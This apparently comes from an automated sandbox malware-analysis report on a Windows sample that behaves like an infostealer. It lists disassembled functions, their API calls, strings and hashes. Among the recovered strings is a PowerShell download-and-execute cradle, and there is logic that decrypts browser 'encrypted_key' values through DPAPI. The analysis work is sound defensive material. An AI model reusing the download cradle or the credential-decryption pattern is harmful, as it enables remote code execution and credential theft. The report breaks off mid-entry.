                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                  Function 022FCC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 022FCC51
                                    • Part of subcall function 022FC206: __getptd_noexit.LIBCMT ref: 022FC209
                                    • Part of subcall function 022FC206: __amsg_exit.LIBCMT ref: 022FC216
                                  • __amsg_exit.LIBCMT ref: 022FCC71
                                  • __lock.LIBCMT ref: 022FCC81
                                  • InterlockedDecrement.KERNEL32(?), ref: 022FCC9E
                                  • free.MSVCRT ref: 022FCCB1
                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 022FCCC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                  • String ID:
                                  • API String ID: 634100517-0
                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                  • Instruction ID: a012a0e43daee45e6e01f8dacfb5f3dfedba2cf864c4fd68e2ce1a776dc9ee4b
                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                  • Instruction Fuzzy Hash: 3201AD32A21B2AABC7A1EBE5944475DF760BF08714F404137EE14672A8CB646441DFD9
                                  Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 0041C9EA
                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                  • __lock.LIBCMT ref: 0041CA1A
                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                  • free.MSVCRT ref: 0041CA4A
                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                  • String ID:
                                  • API String ID: 634100517-0
                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                  Function 022F7167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • strlen.MSVCRT ref: 022F7186
                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022F7401,00000000,00420BA8,00000000,00000000), ref: 022F71B4
                                    • Part of subcall function 022F6E37: strlen.MSVCRT ref: 022F6E48
                                    • Part of subcall function 022F6E37: strlen.MSVCRT ref: 022F6E6C
                                  • VirtualQueryEx.KERNEL32(022F7574,00000000,?,0000001C), ref: 022F71F9
                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022F7401), ref: 022F731A
                                    • Part of subcall function 022F7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022F705F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                  • String ID: @
                                  • API String ID: 2950663791-2766056989
                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction ID: b4bd8eeb78bb4ede988fa66102ea3c19b05c5bbe284d5346f78080d630e382af
                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction Fuzzy Hash: A351F8B1D1010AEBDB44CFD8D981AEFF7B6BF88304F048529FA15A7244D774AA11CBA1
                                  Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • strlen.MSVCRT ref: 00416F1F
                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                  • String ID: @
                                  • API String ID: 2950663791-2766056989
                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                  Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: *n@$*n@
                                  • API String ID: 1029625771-193229609
                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                  Function 022F49E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0064A30C), ref: 022F4A42
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F4A68
                                  • lstrcat.KERNEL32(?,?), ref: 022F4A87
                                  • lstrcat.KERNEL32(?,?), ref: 022F4A9B
                                  • lstrcat.KERNEL32(?,0064A284), ref: 022F4AAE
                                  • lstrcat.KERNEL32(?,?), ref: 022F4AC2
                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 022F4AD6
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022F8FF7: GetFileAttributesA.KERNEL32(00000000,?,022E1DBB,?,?,0042565C,?,?,00420E1F), ref: 022F9006
                                    • Part of subcall function 022F47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022F47E7
                                    • Part of subcall function 022F47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022F47EE
                                    • Part of subcall function 022F47D7: wsprintfA.USER32 ref: 022F480D
                                    • Part of subcall function 022F47D7: FindFirstFileA.KERNEL32(?,?), ref: 022F4824
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                  • Instruction ID: 847f116a5f48ac333e99bcda6484a6307a634ab994cc7fd3dee504f637593392
                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                  • Instruction Fuzzy Hash: C83193BA9503086BDB50FBF0CC84EEDB37AAB48700F4045D9B34596084DEB49789CF95
                                  Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                  Strings
                                  • <, xrefs: 00412D39
                                  • ')", xrefs: 00412CB3
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                  • Opcode Fuzzy Hash: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                  Function 022E1487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022E14A5
                                  • __aulldiv.LIBCMT ref: 022E14BF
                                  • __aulldiv.LIBCMT ref: 022E14CD
                                  • ExitProcess.KERNEL32 ref: 022E14FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction ID: 59a76208ba74fbd1e2a55642bedbe2d77768888a787a1a4f4721aeff0056f913
                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction Fuzzy Hash: F7016DB0960308BAEF10DBD0CC89B9DBBB9AF00705F608468E70A7B2C4D7B499418B55
                                  Function 022EA077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022F0CC7: memset.MSVCRT ref: 022F0E83
                                    • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                    • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                    • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                    • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 022EA116
                                  • memset.MSVCRT ref: 022EA14F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022EA1A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                  • String ID: @
                                  • API String ID: 1977917189-2766056989
                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                  • Instruction ID: 4d61889b6cc6cf9a28471d0d720ec13aac3e0ea3a00a72f8ef000fee25e76126
                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                  • Instruction Fuzzy Hash: 66613F316203489BDF24EFE4CD96FDD7776AF44704F408128EA0A5B694DBB46A05CF51
                                  Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • strtok_s.MSVCRT ref: 00410DB8
                                  • strtok_s.MSVCRT ref: 00410EFD
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s$lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 348468850-0
                                  • Opcode ID: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                  • Opcode Fuzzy Hash: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                  Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 3731072634-738592651
                                  • Opcode ID: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                  • Opcode Fuzzy Hash: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                  Function 022FCDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CodeInfoPageValidmemset
                                  • String ID:
                                  • API String ID: 703783727-0
                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                  • Instruction ID: 4a5e80101a10a497395bbe7b4346c7445c58e1068825383f797269a4bf34c7f1
                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                  • Instruction Fuzzy Hash: 1C312B31A2429A9ED7A5CFB4C854279FFA09B05314B1942BBDA81CF199D768C405C751
                                  Function 022F6B87 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 022F6BD3
                                  • sscanf.NTDLL ref: 022F6C00
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022F6C19
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022F6C27
                                  • ExitProcess.KERNEL32 ref: 022F6C41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                  • Instruction ID: be7223b989078f18044266b5138ef5a6c30e201ba90e43929f2d1fe9ff28c260
                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                  • Instruction Fuzzy Hash: 8921EBB5D14209AFCF48EFE4D9459EEB7BAFF48300F04852EE516A3254EB345604CB65
                                  Function 022F8067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F809E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F80A5
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022F80C5
                                  • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022F80E6
                                  • RegCloseKey.ADVAPI32(?), ref: 022F80F9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction ID: a96c1d8170eca9f8ab5161e618ed699f30b4f09bbf2a98c685518c80326c3dd5
                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction Fuzzy Hash: 0A113DB5A94209BBD710CFD4DD4AFBBF7B9EB05710F104219F615A7290C7B558008BA2
                                  Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,00885FD8,00000000,00020119,?), ref: 00417E5E
                                  • RegQueryValueExA.ADVAPI32(?,0088B108,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3466090806-0
                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                  Function 022F7987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F799B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F79A2
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022F7920), ref: 022F79C2
